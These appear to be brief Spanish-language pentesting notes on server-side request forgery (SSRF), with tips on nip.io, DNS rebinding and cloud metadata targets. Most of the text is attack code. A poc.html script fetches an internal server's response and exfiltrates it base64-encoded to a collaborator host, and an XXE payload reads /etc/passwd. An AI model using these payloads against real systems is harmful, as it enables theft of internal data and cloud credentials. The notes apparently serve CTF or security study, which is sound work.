SSRF
Notas
https://nip.io/ -> Esto mapea a una IP o sea para no usar lit 127.0.0.1
PARA ATAQUES OOB
LEVANTA UN SERVIDOR EN CLOUD PANEL POR EJEMPLO, DENTRO DE ESE CLOUD PANEL
Contenido de poc.html
<script>
exfil = new XMLHttpRequest();
// Set the correct server below e.g https://abcdefg.ctfio.com
// Puedes tratar de poner en el vulnerable server metadata de AWS
exfil.open("GET","https://vulnerable.server/data");
exfil.send();
// put your colab instance below to you can capture the contents of the server
exfil.onload = function(){ document.write('<img src="https://colab_instance.com/?mamaste=' + btoa(this.responseText) + '">'); }
</script>
Intenta DNS RENBINDING
Apunta a la nube
Para hacer un XXE desde un SSRF aloja una pagina html con contenido de xml
<?xml version "1.0" encoding="UTF-8" ?>
<! DOCTYPE payload [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>
&xxe;
</search>
</root>